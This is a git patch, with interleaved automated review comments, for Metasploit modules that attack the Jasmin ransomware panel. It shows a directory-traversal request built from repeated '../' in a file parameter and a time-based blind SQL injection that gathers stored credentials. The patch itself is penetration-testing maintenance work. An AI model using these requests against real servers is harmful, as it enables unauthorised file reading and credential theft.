From 0dee8945ccdaa00215f79e0bc74f40bdee3db6c7 Mon Sep 17 00:00:00 2001
From: h00die
Date: Thu, 25 Apr 2024 16:16:41 -0400
Subject: [PATCH] reviews for jasmin ransomware panel
---
 .../gather/jasmin_ransomware_dir_traversal.rb | 13 +++++++++----
 modules/auxiliary/gather/jasmin_ransomware_sqli.rb | 11 +++++++----
 2 files changed, 16 insertions(+), 8 deletions(-)
diff --git a/modules/auxiliary/gather/jasmin_ransomware_dir_traversal.rb b/modules/auxiliary/gather/jasmin_ransomware_dir_traversal.rb
index 72da2fa8a56ef..fa83ab4d63413 100644
--- a/modules/auxiliary/gather/jasmin_ransomware_dir_traversal.rb
+++ b/modules/auxiliary/gather/jasmin_ransomware_dir_traversal.rb
@@ -6,7 +6,6 @@ class MetasploitModule < Msf::Auxiliary
 include Msf::Auxiliary::Report
 include Msf::Exploit::Remote::HttpClient
- include Msf::Auxiliary::Scanner
 def initialize(info = {})
 super(
@@ -47,27 +46,33 @@ def initialize(info = {})
 )
 end
- def run_host(ip)
+ def check
 res = send_request_cgi(
 'uri' => normalize_uri(target_uri.path)
 )
+ return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
+ return Exploit::CheckCode::Safe("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
- fail_with(Failure::NotFound, 'Check TARGETURI, Jasmin Dashboard not detected') unless res.body.include? 'Jasmin Dashboard'
+ Exploit::CheckCode::Detected('Jasmin Login page detected') if res.body.include? 'Jasmin Dashboard'
+ end
+ def run
 res = send_request_cgi(
 'uri' => normalize_uri(target_uri.path, 'download_file.php'),
 'vars_get' => {
 'file' => "#{'../' * datastore['DEPTH']}#{datastore['FILE']}"
 }
 )
+ fail_with(Failure::Unknown, 'No response from server') if res.nil?
 fail_with(Failure::NotFound, 'Check FILE or DEPTH, file not found on server') if res.body.empty?
+ fail_with(Failure::UnexpectedReply, "Server returned an unexpected HTTP code: #{res.code}") unless res.code == 200
 print_good(res.body)
 # store loot
 path = store_loot(
 'jasmin.webpanel.dir.traversal',
 'text/plain',
- ip,
+ datastore['rhost'],
 res.body,
 File.basename(datastore['FILE'])
 )
diff --git a/modules/auxiliary/gather/jasmin_ransomware_sqli.rb b/modules/auxiliary/gather/jasmin_ransomware_sqli.rb
index 39b6c738440f6..109038377f217 100644
--- a/modules/auxiliary/gather/jasmin_ransomware_sqli.rb
+++ b/modules/auxiliary/gather/jasmin_ransomware_sqli.rb
@@ -7,7 +7,6 @@ class MetasploitModule < Msf::Auxiliary
 include Msf::Auxiliary::Report
 include Msf::Exploit::Remote::HttpClient
 include Msf::Exploit::SQLi
- include Msf::Auxiliary::Scanner
 def initialize(info = {})
 super(
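Review bot: The new `check` in jasmin_ransomware_dir_traversal.rb returns nil when the page answers 200 but does not contain 'Jasmin Dashboard', because its last statement is a modifier-`if` with no fallback, so the "not a Jasmin panel" case yields no CheckCode at all. Make the match an early return and end with an explicit result: `return Exploit::CheckCode::Detected('Jasmin Login page detected') if res.body.include?('Jasmin Dashboard')` followed by `Exploit::CheckCode::Safe("#{peer} - Jasmin Dashboard not detected")`. The `check` added to jasmin_ransomware_sqli.rb in the `-49,13 +48,17` hunk ends with the same line and needs the same change. In `run`, the empty-body test also runs before the status test, so a non-200 reply with an empty body is reported as "file not found"; moving the `res.code == 200` guard above it gives the more accurate error.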
@@ -49,13 +48,17 @@ def initialize(info = {})
 )
 end
- def run_host(ip)
+ def check
 res = send_request_cgi(
 'uri' => normalize_uri(target_uri.path)
 )
+ return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
+ return Exploit::CheckCode::Safe("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
- fail_with(Failure::NotFound, 'Check TARGETURI, Jasmin Dashboard not detected') unless res.body.include? 'Jasmin Dashboard'
+ Exploit::CheckCode::Detected('Jasmin Login page detected') if res.body.include? 'Jasmin Dashboard'
+ end
+ def run
 @sqli = create_sqli(dbms: MySQLi::TimeBasedBlind) do |payload|
 check_char = Rex::Text.rand_text_alpha_lower(5)
 res = send_request_cgi({
@@ -88,7 +91,7 @@ def run_host(ip)
 private_type: :password,
 private_data: user[1],
 service_name: 'Jasmin Webpanel',
- address: ip,
+ address: datastore['RHOST'],
 port: datastore['RPORT'],
 protocol: 'tcp',
 status: Metasploit::Model::Login::Status::UNTRIED
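Review bot: `run` in jasmin_ransomware_sqli.rb now starts the time-based blind queries without first confirming that the target is a Jasmin panel: the removed `fail_with(Failure::NotFound, ...)` guard moved into `check`, and nothing in this hunk calls `check` from `run`. The same holds for `run` in jasmin_ransomware_dir_traversal.rb. If the module does not already `prepend Msf::Exploit::Remote::AutoCheck` outside the lines shown, either add it or gate `run` on the check result so requests are not sent to an unrelated service at TARGETURI. The body of `run` continues past the end of the hunk.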
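Review bot: The credential's `address:` reads `datastore['RHOST']` here while the `store_loot` call in jasmin_ransomware_dir_traversal.rb uses `datastore['rhost']`; pick one spelling, or use the `rhost` helper that HttpClient provides in both places, e.g. `address: rhost,`. If RHOST holds a hostname rather than an IP, the credential and the loot would be recorded under that name; whether the reporting layer resolves it is not visible here, so that is worth confirming. The hash being edited opens and closes outside the hunk.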